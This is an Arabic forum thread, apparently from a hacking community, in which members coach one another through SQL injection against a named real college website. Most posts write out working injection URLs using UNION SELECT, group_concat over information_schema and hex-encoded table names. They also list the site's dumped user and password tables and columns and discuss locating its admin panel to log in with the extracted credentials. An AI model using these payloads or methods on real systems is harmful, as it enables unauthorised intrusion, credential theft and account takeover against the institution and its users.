|
استفساار شبااب من فضلكم الدخوول السلام عليكم شبااب اتمنى أن ألقى عندكم حل لهذه المشاكل المشكل الأول : خلال الحقن و لنا نستخرج مجال الجداول يعني نكون في الأمر order by و ننتهي منو وننتقل ل union select و نضع عدد الجداول اللي لقيناها لكن المشكل هو أنوو مو تظهر الأعمدة المصااابة . المشكل التاني : مثلا نجد الأعمدة المصابة لكن لما أجي أحقنها لكي أستخرج الجودل و عمود اليوزر و الباس ما يظهرو لي ايش الحل . ؟؟ المشكل الثالث : بعض الأحيان نصل و نأتي لنستخرج اسم اليوزر و الباص الخاص به ( قاعدة 5 ) نستعمل أمر limit للتنقل و معرفة اجم الجدول و العمود الصحيحة لكن المشكل هنا مثلاا مثلا نجد الباص عندو جدول وحدوو و اليوزر جدول أخر ايش الحل شبااب ؟؟؟ و السلام عليكم و رحمة الله . |
المشكل التاني اضن انه يجب ان تقوم بالblind sql |
وعليكم السلام يا اخي المشاكل يلي بتصير بالحقن كثرت الايام الاخيره بسبب المواقع كلها صارت تحمي حالها شويه وحتى اقدر اساعدك اقتباس:
المشكله الثانيه اقتباس:
المشكله الاخيره اقتباس:
|
النسبة للمشكل الأول و الله ما عندي موقع : لكن راح أوضح لك بالتفصيل : مثلاا لدياا site.com/me.php?id=1 هذا فيه خطأ احنا استخرجناا راح نستعمل order by لإستخراج الأعمدة مثلاا لدينا 11 عموود يعني موقعنا راح يصير كده :--site.com/me.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11 ( احنا عملنا كده لنعرف الأعمده اللي مصابة لكي نستغلها لنستخرج الجداول ) لكن اما أصل الى هناا فلا اتظهر لي الأعمدة المصابه تبقى الصفحه فارغة م ا فيها الأرقام ( اللي هي الأعمدة المصابه ) و بالنسبة للمشكل الأخير : ده مثاال و شوووفه و رد علي ( أتمنى أنك تحقنه من الصفر و راح تفهم قصدي ) http://www.mcny.edu/news/newsdetail....2+from+users-- http://www.mcny.edu/news/newsdetail....om+facultydb-- |
[[phphttp://www.mcny.edu/news/newsdetail.php?id=-309%20UNION%20SELECT%201,2,3,4,5,concat(user_name, 0x3a,password),7,8,9,10,11,12+from+users-- [/php] لمشاهده جيمع الاعضاء باستخدام الامر group بديل الامر لميت كود PHP: بالموقع الثاني انت ليش داخل هون [ facultydb ] عندنا جدول لليوزر بنروح عليه [users ] زي ما انت شايف زبط معانا الموقع بالنسبه للجدول facultydb هاي الاعمده الي بداخلو userIDlnamefnamedeptnameextnumroomnumemail بالنسبه للمشكله دي اقتباس:
هيك اشي كان المشكله بالموقع الي عملت عليه المسابقه المشكله الي حصلت معاك الان ابقى جيب لي موقع وانشوف مشكلته (كل موقع له مشاكله الخاصه والحلول لازم تيجي من دماغك بقى نظفو وفكر كويس وانت ابتكر حلول وخليك مستكشف بقى ) |
فولكانو شوي شوي يا غالي انت من وين جبت user_name لأني أنا مو لقيتهاا أنا حطيت لك الموقعين أنا لما حقنتوو طلعلي جدول الباس مختلف عن جدول اليوزر ممكن تفسر لي |
عن ايا واحد فيهم تحكي اذا كان قصدك الاول انت وصلت لهون صح http://www.mcny.edu/news/newsdetail....2+from+users-- الان نشوف كيف انت وصلت له ؟؟؟؟؟؟ رح تقلي عملت بحث عن كلمه باس طيب وبعد عرفت عرفنت من البحث الجدول users والعمود pass الخطوه الثانيه نروح موقع http://www.waraxe.us/sql-char-encoder.html نشفر كلمه ال users اسم الجدول ونستعرض الي بداخلها من خلال الامر group بيطلع لنا التالي http://www.mcny.edu/news/newsdetail....CT%201,2,3,4,5,group_concat(table_name,0x3a,column_name,0x3a,table_sch ema),7,8,9,10,11,12++from+information_schema.colum ns+where+table_name=0x7573657273 الظاهر عندك نقطه ضعف بس انا مش عارف في ايا درس (شكلك مار عن درس بدون لا تشوفه ) اتمنا ان ما زال مشكله تخبرني بانتظارك |
راح أراجع الدروس من الأول و أشوف و برجعلك أخي أكي ؟؟ + و راح أعاود أحقنه من الصفر و أشووف و برد عليك ربنا ينصرك و ما يحرمن منك ( أعتقد انك مو فكرني كنت كلمة من زمان في روم شات الوتياات لوول ) المهم لي عودة بعم ما أشوف الدروس |
هههه ايا شات + موفق |
أسف أخي فولكانو لم أرد عليك بسرعة + الأن راجعت الدروس من الأول حتى الدرس 10 و ان شاء الله راح انتهي غداا بإذن الله + لكن أخي هذا الموقع http://www.mcny.edu عملت عليه ثاني و في جداول الباس استخرجت ثلاث جداول بأمر group جدولين لما أشوف أجرب عليهم بيقولي غير موجودين و الجدول اللي عمل معي هو users المهم لما استخرجت اليوزر و الباص لأسف لم يرد أن يفتح معي في لوحة التحكم ايش حل هذا المشكل ؟؟؟ |
اقتباس:
مسار اللوحه الي وصلت له مش بتاع اليوزر والباس الي احنا طلعناهم طيب الحل بقى وين اما بدك تبحث عن يوزر وباس اخرين واما تجد اللمسار الصحيح للوحه الي استخرجا الباس تاعها |
1 مرفق أنا عملت ملف و هو في المرفق شوفه و رد علي يا كبيرنااا و السلام عليكم |
الجهاز ما يدعم اللغه العربيه (خاص او رد ) |
أسف على الخطأ ------------------ الحقن لإسخراج جميع الأعمدة و الجداول للباس رابط الحقن : http://www.mcny.edu/news/newsdetail....115,%2037%29-- هذاول الجداول ....: users:password:audrey_mcnydb wp_posts:post_password:audrey_test wp_users:user_pass:audrey_test أنا راح أبدأ من أخر جدول ( wp_users ) تشفيره : 0x77705f7573657273 رابط الحقنه لليوزر http://www.mcny.edu/news/newsdetail....5f7573657273-- تجربة لإستخرللج اليوزر : http://www.mcny.edu/news/newsdetail....rom+wp_users-- تجربه 2 : http://www.mcny.edu/news/newsdetail....rom+wp_users-- شوف ايش يطلع لي Table 'audrey_mcnydb.wp_users' doesn't exist --------------------------------- الأن راح أمر للجدول الثاني (wp_posts) تشفيره : 0x77705f706f737473 رابط الحقنه : http://www.mcny.edu/news/newsdetail....5f706f737473-- أعتقد أن هذا و بنسبة 99 بالمئة ما يحتوي على اليوزر مثال على الطاير : http://www.mcny.edu/news/newsdetail....rom+wp_posts-- ----------------------------------------- الأن أمر للجدول اللي زبط معناا ( users) تشفيره : 0x7573657273 users:fname:audrey_mcnydb users:lname:audrey_mcnydb users:email:audrey_mcnydb users:department:audrey_mcnydb users:user_name:audrey_mcnydb users:password:audrey_mcnydb users:level:audrey_mcnydb users:page:audrey_mcnydb users:user_id:audrey_mcnydb http://www.mcny.edu/news/newsdetail....2+from+users-- ------------------------------------ هذو مسارات طلعهااا برنامج هافيج Page Found: http://www.mcny.edu/manage/ Page Found: http://www.mcny.edu/controlpanel/ Page Found: http://www.mcny.edu/cpanel/ Page Found: http://www.mcny.edu/kpanel/ Page Found: http://www.mcny.edu/secure/ ان لم يكن هذول هم الصحااح طب كيف أطلع مسار لوحة التحكم الصحيحة ؟؟؟ |
| الساعة الآن 10:28 PM |
[ vBspiders.Com Network ]